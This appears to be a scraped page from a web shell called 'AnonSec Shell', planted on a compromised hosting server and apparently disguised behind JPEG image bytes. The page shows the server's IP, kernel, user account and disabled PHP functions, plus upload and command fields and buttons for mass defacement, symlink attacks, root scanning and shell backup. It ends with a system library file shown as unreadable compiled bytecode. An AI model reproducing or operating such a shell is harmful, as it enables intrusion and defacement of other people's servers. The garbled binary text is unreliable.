JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 46.28.45.50  /  Your IP : 216.73.217.148   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux in-mum-web1275.main-hosting.eu 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User : u215115003 ( 215115003)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib64/python2.7/bsddb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib64/python2.7/bsddb/dbrecio.pyc
�
{fc@s5dZddlZddlZddd��YZdS(s�
File-like objects that read from or write to a bsddb record.

This implements (nearly) all stdio methods.

f = DBRecIO(db, key, txn=None)
f.close()           # explicitly release resources held
flag = f.isatty()   # always false
pos = f.tell()      # get current position
f.seek(pos)         # set current position
f.seek(pos, mode)   # mode 0: absolute; 1: relative; 2: relative to EOF
buf = f.read()      # read until EOF
buf = f.read(n)     # read up to n bytes
f.truncate([size])  # truncate file at to at most size (default: current pos)
f.write(buf)        # write at current position
f.writelines(list)  # for line in list: f.write(line)

Notes:
- fileno() is left unimplemented so that code which uses it triggers
  an exception early.
- There's a simple test set (see end of this file) - not yet updated
  for DBRecIO.
- readline() is not implemented yet.


From:
    Itamar Shtull-Trauring <itamar@maxnm.com>
i����NtDBRecIOcBsteZd
d�Zd�Zd�Zdd�Zd�Zdd�ZdZ	d
d	�Z
d
�Zd�Zd�Z
RS(cCsC||_||_||_d|_d|_d|_d|_dS(Ni(tdbtkeyttxntNonetlentpostclosedt	softspace(tselfRRR((s%/usr/lib64/python2.7/bsddb/dbrecio.pyt__init__#s						cCs%|js!d|_|`|`ndS(Ni(RRR(R	((s%/usr/lib64/python2.7/bsddb/dbrecio.pytclose,s		cCs|jrtd�ndS(NsI/O operation on closed filei(Rt
ValueError(R	((s%/usr/lib64/python2.7/bsddb/dbrecio.pytisatty1s	icCsc|jrtd�n|dkr1||j}n|dkrM||j}ntd|�|_dS(NsI/O operation on closed fileiii(RRRRtmax(R	Rtmode((s%/usr/lib64/python2.7/bsddb/dbrecio.pytseek6s	cCs|jrtd�n|jS(NsI/O operation on closed file(RRR(R	((s%/usr/lib64/python2.7/bsddb/dbrecio.pyttell?s	i����cCs�|jrtd�n|dkr-|j}nt|j||j�}||j}|jj|jd|jd|d|j�}||_|S(NsI/O operation on closed fileiRtdlentdoff(	RRRtminRRtgetRR(R	tntnewposRtr((s%/usr/lib64/python2.7/bsddb/dbrecio.pytreadDs	
-	s|
    def readline(self, length=None):
        if self.closed:
            raise ValueError, "I/O operation on closed file"
        if self.buflist:
            self.buf = self.buf + string.joinfields(self.buflist, '')
            self.buflist = []
        i = string.find(self.buf, '
', self.pos)
        if i < 0:
            newpos = self.len
        else:
            newpos = i+1
        if length is not None:
            if self.pos + length < newpos:
                newpos = self.pos + length
        r = self.buf[self.pos:newpos]
        self.pos = newpos
        return r

    def readlines(self, sizehint = 0):
        total = 0
        lines = []
        line = self.readline()
        while line:
            lines.append(line)
            total += len(line)
            if 0 < sizehint <= total:
                break
            line = self.readline()
        return lines
    c	Cs�|jrtd�n|dkr-|j}n<|dkrNttjd��n||jkri||_n|jj|j	dd|j
d|j|d|�dS(NsI/O operation on closed fileisNegative size not allowedtRRR(RRRRtIOErrorterrnotEINVALRtputRRR(R	tsize((s%/usr/lib64/python2.7/bsddb/dbrecio.pyttruncaters		c	Cs�|jrtd�n|sdS|j|jkr^|jjd|j|j�|j|_n|jt|�}|jj|j|d|j	dt|�d|j�||_dS(NsI/O operation on closed filesRRR(
RRRRtbuflisttappendRRRR(R	tsR((s%/usr/lib64/python2.7/bsddb/dbrecio.pytwrite~s	4cCs|jtj|d��dS(NR(R$tstringt
joinfields(R	tlist((s%/usr/lib64/python2.7/bsddb/dbrecio.pyt
writelines�scCs|jrtd�ndS(NsI/O operation on closed file(RR(R	((s%/usr/lib64/python2.7/bsddb/dbrecio.pytflush�s	N(t__name__t
__module__RR
RR
RRRt_DBRecIO__fixmeR R$R(R)(((s%/usr/lib64/python2.7/bsddb/dbrecio.pyR"s					,		((t__doc__RR%R(((s%/usr/lib64/python2.7/bsddb/dbrecio.pyt<module>s�

Anon7 - 2022
AnonSec Team